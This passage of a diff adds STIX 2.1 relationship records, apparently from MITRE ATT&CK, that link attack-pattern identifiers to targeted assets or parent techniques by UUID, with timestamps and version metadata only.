"attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2dc39956-05d1-4dd5-86db-cb70568d73fe", + "created": "2023-09-29T17:39:15.857Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:39:15.857Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2dca5301-0f95-460f-97fb-879c4cf5cdb7", + "created": "2024-06-26T14:51:40.930Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:51:40.931Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2df8d89a-bf5c-441b-87bc-52a3c409af79", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2dfc0a0b-28d9-4f52-8bd3-506377731222", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2e02a28e-5113-40e9-8604-a89ed3b09959", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2e06f20b-d93a-41b2-a5e3-87d1a4800a9f", + "created": "2024-03-07T19:32:36.298Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-07T19:32:36.298Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2e09c503-e106-4151-80dc-b0316be03a0f", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2e1c5fb2-d7b0-48cb-b5e1-5faf58ea5361", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2e32e0fd-24cf-4a41-b56d-98ada9f1db8a", + "created": "2023-09-28T19:40:51.425Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:40:51.425Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2e3365f0-808d-4ca1-a747-5730d0cd1800", + "created": "2024-06-26T13:39:14.933Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:39:14.933Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2e352d5b-70c6-42cd-a0e9-86944a8a9be1", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2eaba5c0-bf06-49fe-8964-0019cfdd0a34", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ec72f01-2e02-4f4f-b5b3-8f8fe9ff3e39", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ecf9476-b546-44ff-8547-4ca56cf7eeb8", + "created": "2023-09-28T20:02:05.365Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:02:05.365Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f0f02ef-49f0-4de4-80ce-97ba5e8615aa", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f0f6539-f88b-499c-b5c5-9e776641c493", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f21c707-0fb8-4f7f-9469-1e16c2b3c9b6", + "created": "2020-10-19T19:13:59.737Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", + "target_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f4393d5-4361-4988-a568-936cd3efbb60", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f457bef-1721-4e0f-b236-24e4652a31b4", + "created": "2023-09-29T16:29:53.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:29:53.181Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f5ca645-660b-43d8-a0ff-37ed8f8a0be0", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f5e76a5-727c-4c83-885c-2844f610f6c8", + "created": "2024-05-22T17:15:38.214Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:03:46.215Z", + "description": "Asset Mapping Rationale: ", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f7c49a0-89fe-4d18-915c-c321868d47bd", + "created": "2024-04-09T21:02:56.157Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T21:02:56.157Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f7de17c-3577-488b-8a7e-80335bdce99a", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f973098-ef83-43a5-9813-a5aef8ff48dc", + "created": "2020-08-10T13:59:38.625Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2f9c25af-d2e2-4793-85bf-6e2696384a50", + "created": "2023-09-28T20:30:21.865Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:30:21.865Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2fa075b3-f633-4445-a144-ab7da35f5878", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2faa6b90-8478-4004-86e0-354f35e21c41", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2fb18a45-8ba0-401d-9ee6-18099b4c2c39", + "created": "2021-02-22T14:20:31.751Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", + "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2fc621cc-5a63-43f4-a339-2754c80987c1", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2fd25d23-7aeb-43de-8f98-cf0baa66f210", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2fd8a76f-4663-4251-a16d-e1f105a854f9", + "created": "2023-09-28T19:43:28.167Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:43:28.167Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2fdf38cd-5fcc-43aa-8f22-d68b635b5e7f", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2fe222c4-cc81-473d-956e-235e2961a5c3", + "created": "2023-09-29T17:04:26.769Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:04:26.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2fea4730-97f2-4350-aa65-34b2bc324268", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2febb25f-c9a2-404a-b9ae-6a936a6fdeff", + "created": "2024-06-26T13:38:30.414Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:38:30.414Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--301e8d6b-1717-44bd-a549-8fc99c11f142", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30486690-d7c3-404d-93a1-919974217233", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--305866af-1f36-49e0-a57d-d5faaf29011c", + "created": "2023-09-28T20:34:52.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:34:52.740Z", + "description": "", + 